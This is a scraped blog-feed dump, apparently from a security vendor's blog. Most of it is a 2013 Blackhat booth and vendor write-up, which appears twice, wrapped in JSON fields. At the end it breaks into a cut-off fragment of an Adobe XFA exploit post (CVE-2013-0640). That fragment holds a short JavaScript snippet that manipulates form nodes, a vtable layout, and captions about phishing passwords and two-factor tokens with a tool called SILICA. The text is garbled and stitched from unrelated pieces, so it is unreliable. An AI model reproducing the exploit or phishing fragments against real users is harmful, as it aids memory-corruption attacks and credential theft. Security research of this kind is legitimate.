- I saw a bunch of vendors with six figure booths setting up seating and making people watch movies. I didn't see a lot of butts in seats. What did work surprisingly well was a trivia game the Venafi folks set up where you could win an Apple TV. Every time they did this they had a pretty sizable crowd and they were nice guys to boot.\n\n
- When Nico approaches your booth where you're advertising a product to implement \"zero day protection\" to ask some very pointed questions, that's an intimidating situation. But these folks weren't intimidated. Why? Because they were marketing and sales engineering people who had no idea how their product actually worked to survive any level of professional scrutiny.\n\n
- Almost all of the material I demoed for SWARM was stuff I found the day before the sponsor hall opened. David A. and I put in a crap ton of work getting the SWARM set up working in a laptop powered VM but not so much on what we were going to show. It created the opportunity to find something new in our dataset and get excited about it which made a really effective demo. \n\n
- We had a bunch of grumpy old men approach our booth this year. They all seemed to respond well to me giving it right back to them. Perhaps a winning strategy?\n\n
- I saw folks throwing out some guesses about the number of women present. I saw 1:15 through 1:30, I wasn't keeping count (that would be creepy) but it seemed like more than last year. I chatted with @Tardissauce a bit about this at hackcup. Her thought was that Blackhat tends to attract attendees higher up the corporate ladder than DefCon, there are more women in these positions now and therefore that ratio is going to start to even out. It's odd since the talks are normally highly technical. It is the rare manager who can appreciate a talk on double-fetch bugs in the Windows Kernel.\n\n
Booth stuff\n
- Investing in carpet and padding underneath is completely worth it, my knees and feet were saved\n\n
- If you're going to buy labor, buy tear down labor rather than setup labor. You'll want to get your booth set up just the way you want it initially but by the end of the conference you're so tired you just want someone else to pack everything up. We waited 3.5 hours for our pallet and supplies to come to our booth at the end of the conference. Things got weird.\n\n
- In our 3.5 hours of time I did a lot of walking around the vendor hall as it was being packed up. I counted about 5 servers or devices I could've made off with without anyone being the wiser. If you're bringing that type of gear secure it yourself before tear down.\n\n
- I think our booth looked pretty good but we did have a lot of people asking us \"so what do you guys do?\" If we were going to do something like this again we'd want to put some kind of sign up like: \"Pen-Testing Tools for Professionals\". It was pretty liberating to repeatedly tell people that I didn't give a toss about configuring a firewall though.\n\n
- Invest in shirts that are not black. Everyone wore black shirts.\n\n
- I can almost guarantee your sales slicks are too wordy. I ain't reading a white paper here.\n\n
- There needs to be a medical reason for you to wear sunglasses at your booth, which is inside.\n\n
Vendor Freebies\n
- Best Overall: Again Qualys wins with their red freebie bag. As soon as you walked in the vendor hall you saw Qualys' booth and had the opportunity to get a reasonable quality bag for all your freebies. Everyone had one and everyone put all the other vendor freebies into their Qualys bag, reducing the exposure of other vendors and limiting the impact of their marketing investment. WELL PLAYED QUALYS >:[\n\n
- Best Shirt: Spider Labs' mall-airbrush-kiosk style graffiti on a bright orange shirt
\n- Shirt Runner-Up: Splunk \"Taking the sh out of it\"
\n- Shirt honorable mention: Core Security, faux-tux shirt
\n\n
- Worst Overall: I didn't like the light saber thingies at all and no one I talked to about it did either. I guess the hook was that if you took this training it turned you into some kind of hacking Jedi? Brotip: if you're turning people into Jedis you should at least be able to talk about your syllabus without referring people directly to your website :P\n\n
Shameless plugs\n
You can read my 2012 vendor perspective blog post here. "],"link":["https://immunityproducts.blogspot.com/2013/08/blackhat-2013-vendors-perspective.html"],"author":["noreply@blogger.com (Alex McGeorge)"],"thr:total":["0"],"text_description":"Immunity was a Blackhat sponsor again this year, potentially our last outing for a while. Thanks to everyone who came by our booth! It was fun to meet customers face to face and friends we don't get to see that often. \n\nThings I observed\n- Let me define booth babes as someone you short-term hire specifically to work your booth to attract people's attention based on their looks. I only saw one vendor, ironically an educational vendor, who had staff that fit this description.\n\n- I made it a point to talk to some women who came through our booth about booth babes and I found some very different definitions as to what would qualify someone. The most liberal definition was the babe in question could be a full time employee but if they got especially \"tarted up\" for their booth time then they qualified. By this definition there appeared to be significantly more booth babes in attendance. \n\n- One vendor who put up an enormous booth near the front had, and I'm not kidding, a grandpa doing a magic show. Later their PR person came over and introduced himself scouting for business. I wish I had the presence of mind to ask how that decision happened.\n\n- Did Randy Couture count a male booth babe or as a celebrity endorsement? If he is a booth babe he's the only one who can easily get me in a rear naked choke, so he's whatever he wants to be.\n\nThings we Learned\n- The big buzzword this year was \"managed\", manage your VPNs, manage your logs, manage your certificates, manage your ssh keys (?!), manage your life! \n\n- Nico and I both walked around and didn't see any new products that blew our minds.\n\n- Immunity went with no dedicated sales staff and I think it worked out well. 
People were pretty surprised when they talked to someone who knew what was going on with their product. Is it worth taking technical people off of other projects to staff a booth? I think regarding reputation it probably is, regarding revenue still remains to be seen.\n\n- I saw a bunch of vendors with six figure booths setting up seating and making people watch movies. I didn't see a lot of butts in seats. What did work surprisingly well was a trivia game the Venafi folks set up where you could win an Apple TV. Every time they did this they had a pretty sizable crowd and they were nice guys to boot.\n\n- When Nico approaches your booth where you're advertising a product to implement \"zero day protection\" to ask some very pointed questions, that's an intimidating situation. But these folks weren't intimidated. Why? Because they were marketing and sales engineering people who had no idea how their product actually worked to survive any level of professional scrutiny.\n\n- Almost all of the material I demoed for SWARM was stuff I found the day before the sponsor hall opened. David A. and I put in a crap ton of work getting the SWARM set up working in a laptop powered VM but not so much on what we were going to show. It created the opportunity to find something new in our dataset and get excited about it which made a really effective demo. \n\n- We had a bunch of grumpy old men approach our booth this year. They all seemed to respond well to me giving it right back to them. Perhaps a winning strategy?\n\n- I saw folks throwing out some guesses about the number of women present. I saw 1:15 through 1:30, I wasn't keeping count (that would be creepy) but it seemed like more than last year. I chatted with @Tardissauce a bit about this at hackcup. Her thought was that Blackhat tends to attract attendees higher up the corporate ladder than DefCon, there are more women in these positions now and therefore that ratio is going to start to even out. 
It's odd since the talks are normally highly technical. It is the rare manager who can appreciate a talk on double-fetch bugs in the Windows Kernel.\n\nBooth stuff\n- Investing in carpet and padding underneath is completely worth it, my knees and feet were saved\n\n- If you're going to buy labor, buy tear down labor rather than setup labor. You'll want to get your booth set up just the way you want it initially but by the end of the conference you're so tired you just want someone else to pack everything up. We waited 3.5 hours for our pallet and supplies to come to our booth at the end of the conference. Things got weird.\n\n- In our 3.5 hours of time I did a lot of walking around the vendor hall as it was being packed up. I counted about 5 servers or devices I could've made off with without anyone being the wiser. If you're bringing that type of gear secure it yourself before tear down.\n\n- I think our booth looked pretty good but we did have a lot of people asking us \"so what do you guys do?\" If we were going to do something like this again we'd want to put some kind of sign up like: \"Pen-Testing Tools for Professionals\". It was pretty liberating to repeatedly tell people that I didn't give a toss about configuring a firewall though.\n\n- Invest in shirts that are not black. Everyone wore black shirts.\n\n- I can almost guarantee your sales slicks are too wordy. I ain't reading a white paper here.\n\n- There needs to be a medical reason for you to wear sunglasses at your booth, which is inside.\n\nVendor Freebies\n- Best Overall: Again Qualys wins with their red freebie bag. As soon as you walked in the vendor hall you saw Qualys' booth and had the opportunity to get a reasonable quality bag for all your freebies. Everyone had one and everyone put all the other vendor freebies into their Qualys bag, reducing the exposure of other vendors and limiting the impact of their marketing investment. 
WELL PLAYED QUALYS >:[\n\n- Best Shirt: Spider Labs' mall-airbrush-kiosk style graffiti on a bright orange shirt\n- Shirt Runner-Up: Splunk \"Taking the sh out of it\" \n- Shirt honorable mention: Core Security, faux-tux shirt \n\n- Worst Overall: I didn't like the lightsaber thingies at all, and no one I talked to about it did either. I guess the hook was that if you took this training it turned you into some kind of hacking Jedi? Brotip: if you're turning people into Jedi you should at least be able to talk about your syllabus without referring people directly to your website :P\n\nShameless plugs\nYou can read my 2012 vendor perspective blog post here. "},{"guid":[{"_":"tag:blogger.com,1999:blog-7337853103195839314.post-1765978048724037010","$":{"isPermaLink":"false"}}],"pubDate":["Mon, 24 Jun 2013 14:39:00 +0000"],"atom:updated":["2013-06-24T07:39:56.911-07:00"],"category":[{"_":"adobe","$":{"domain":"http://www.blogger.com/atom/ns#"}},{"_":"CANVAS","$":{"domain":"http://www.blogger.com/atom/ns#"}},{"_":"CVE-2013-0640","$":{"domain":"http://www.blogger.com/atom/ns#"}},{"_":"mosdef","$":{"domain":"http://www.blogger.com/atom/ns#"}}],"title":["Adobe XFA exploits for all! First Part: The Info-leak"],"description":["
var node = xfa.resolveNode(\"xfa[0].form[0].form1[0].#pageSet[0].page1[0].#subform[0].field0[0].#ui\");\n\nnode.oneOfChild = choiceListNodes.pop();\n\n
---- 0x0 Vtable pointer\n | 0x4 RefCount\n ---> 0x8 Destructor's address\n\n
Infoleak running on Windows 7
Facebook, Twitter, Hotmail and Gmail account passwords intercepted in SSL traffic during a controlled phishing attack using SILICA.
90% of people will click \"Continue\" to get what they came for and give SILICA the passwords.
Using SILICA to successfully phish for a legitimate Twitter two-factor authentication token.
Version | Percentage | \n
13.X | 12.6% | \n
12.X | 21.5% | \n
11.X | 20.4% | \n
10.X | 21.1% | \n
9.X | 17.4% | \n
8.X | 2.8% | \n
7.X | 2.7% | \n
6.X | 1.4% | \n
